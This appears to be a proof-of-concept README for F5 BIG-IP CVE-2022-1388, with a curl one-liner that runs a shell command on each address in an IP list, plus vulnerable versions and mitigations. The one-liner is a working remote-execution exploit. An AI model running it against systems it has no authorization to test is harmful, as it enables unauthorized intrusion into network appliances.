BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services
PoC
You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';doneVulnerable Versions (Big-IP)
| Branch | Vulnerable Versions | Fixes Introduced |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | No Fix |
| 12.x | 12.1.0-12.1.6 | No Fix |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | None | 17.0.0 |
Mitigation
- Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)
- Block iControl REST access through the self IP address
- Block iControl REST access through the management interface
- Modify the BIG-IP httpd configuration
For more information about mitigation check out the references.
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit